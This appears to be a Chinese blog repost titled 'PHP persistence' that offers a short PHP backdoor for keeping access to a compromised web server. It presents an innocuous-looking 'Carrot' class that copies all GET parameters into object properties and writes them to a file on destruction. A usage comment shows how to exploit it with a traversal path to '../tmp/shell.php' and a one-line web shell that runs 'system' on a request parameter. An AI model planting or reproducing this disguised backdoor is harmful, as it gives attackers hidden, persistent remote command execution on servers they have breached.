PHP权限维持

好大一条虫 324 次浏览 0

转自

PHP权限维持

<?php
'''
 * Usage: http://localhost/?id=../tmp/shell.php&lost=<?php system($_REQUEST["cmd"]);?> 
'''

class Carrot {
    const EXTERNAL_DIRECTORY = '/tmp/';
    private $id;
    private $lost = 0;
    private $bought = 0;

    public function __construct($input) {
        $this->id = rand(1, 1000);

        foreach ($input as $field => $count) {
            $this->$field = $count++;
        }
    }

    public function __destruct() {
        file_put_contents(
            self::EXTERNAL_DIRECTORY . $this->id,
            var_export(get_object_vars($this), true)
        );
    }
}

$carrot = new Carrot($_GET);

发表评论 取消回复
表情 图片 链接 代码